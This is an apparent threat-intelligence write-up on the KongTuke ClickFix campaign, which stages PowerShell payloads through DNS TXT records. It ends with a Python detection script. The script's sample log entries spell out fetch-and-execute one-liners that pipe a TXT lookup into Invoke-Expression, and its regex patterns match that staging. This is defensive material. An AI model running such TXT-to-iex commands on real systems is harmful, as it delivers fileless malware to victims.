The KongTuke operation has continued to refine its tradecraft. Active since mid-2025, this group of threat actors has steadily adjusted its methods to evade traditional enterprise security controls.
Their main tool remains the "ClickFix" technique, a social-engineering method that tricks unsuspecting users into manually "fixing" fake website errors.
During these attacks, targets encounter fraudulent browser error messages or verification captchas on compromised legitimate sites.
Misleading instructions encourage them to copy a malicious script and paste it directly into the Windows Run dialog or a PowerShell window.
This "self-infection" strategy sidesteps automated download protections by using the victim's own system privileges to run unauthorized code.
Recently, however, a notable step up in technical sophistication has emerged. Unit 42 analysts found that the latest KongTuke variants now use DNS TXT records to conceal the next stage of the attack chain.
Rather than contacting a flagged web server over HTTP, the initial script queries the DNS records of a seemingly legitimate domain and extracts the malicious staging instructions from a TXT record.
This approach considerably complicates detection for defenders who rely primarily on inspection of HTTP traffic.
By embedding the payload in DNS replies, attackers blend their malicious traffic into the constant background noise of ordinary name resolution.
The overarching objective remains the deployment of significant malware, frequently resulting in the installation of the Interlock remote access trojan or other enduring threats within the network.
Mechanism of DNS TXT Staging
The technical innovation lies in the method of payload retrieval. When the target executes the initial ClickFix snippet, it does not immediately download a file.
Instead, it activates a PowerShell command that performs a DNS query for a designated TXT record.
These records, typically meant to store text information for domain validation, include the staged command string needed to acquire and execute the final payload.
Security measures often permit DNS traffic without restrictions to guarantee connectivity, creating a perilous blind spot.
The script extracts the text from the DNS response and executes it in memory, leaving negligible traces on the disk.
This “fileless” acquisition enables the KongTuke operation to maintain a discreet presence while establishing persistence on compromised endpoints.
Recommended mitigations include blocking newly registered domains, inspecting DNS traffic for anomalies, and closely monitoring PowerShell execution logs for suspicious DNS lookup commands.
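The last recommendation, monitoring PowerShell execution logs for suspicious DNS lookups, can be turned into a simple detection rule. The following is an added example written for this page, not code from Unit 42 or the KongTuke samples: it scans constructed Script Block Logging entries (Event ID 4104 style) and flags a TXT-record lookup that feeds in-memory execution in the same block, while rating a TXT lookup on its own (routine for SPF/DMARC checks) as low severity. The hostnames and domains are placeholders, not real indicators.

```python
import re

# Constructed sample entries in the shape of PowerShell Script Block Logging
# (Event ID 4104) records: (hostname, script block text). Illustrative only;
# the domains are placeholders, not indicators from any real incident.
SAMPLE_SCRIPT_BLOCKS = [
    ("host-01", "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"),
    ("host-02", "Resolve-DnsName -Name staging.example.invalid -Type TXT | "
                "ForEach-Object { $_.Strings } | Invoke-Expression"),
    ("host-03", "$r = nslookup -type=txt cfg.example.invalid; iex ($r -join '')"),
    ("host-04", "Resolve-DnsName -Name _dmarc.example.com -Type TXT"),
]

# A TXT-record lookup via either PowerShell's Resolve-DnsName or the nslookup binary.
TXT_LOOKUP = re.compile(r"(?:Resolve-DnsName[^\n;|]*-Type\s+TXT|nslookup[^\n;|]*-type=txt)", re.I)
# In-memory execution of a string: the "fileless" step the article describes.
INMEM_EXEC = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I)
# The domain being queried, from either tool's syntax.
QUERIED_DOMAIN = re.compile(r"(?:-Name\s+|Resolve-DnsName\s+(?!-)|-type=txt\s+)([A-Za-z0-9._-]+)", re.I)


def classify_script_block(text):
    """Return (severity, domain) for one script block.

    high: TXT lookup and in-memory execution in the same block (staging pattern).
    low:  TXT lookup alone; routine for SPF/DMARC checks, worth logging only.
    none: nothing DNS-TXT related.
    """
    if not TXT_LOOKUP.search(text):
        return "none", None
    m = QUERIED_DOMAIN.search(text)
    domain = m.group(1).lower() if m else None
    severity = "high" if INMEM_EXEC.search(text) else "low"
    return severity, domain


def find_dns_txt_staging(entries, min_severity="low"):
    """Scan (host, script_block) pairs and return findings at or above min_severity."""
    rank = {"none": 0, "low": 1, "high": 2}
    findings = []
    for host, block in entries:
        severity, domain = classify_script_block(block)
        if rank[severity] >= rank[min_severity]:
            findings.append({"host": host, "severity": severity, "domain": domain})
    return findings


if __name__ == "__main__":
    for finding in find_dns_txt_staging(SAMPLE_SCRIPT_BLOCKS):
        print(finding)
```

The extracted domain is meant to be joined against DNS query logs and a newly-registered-domain feed, which is where the first two recommendations above come in.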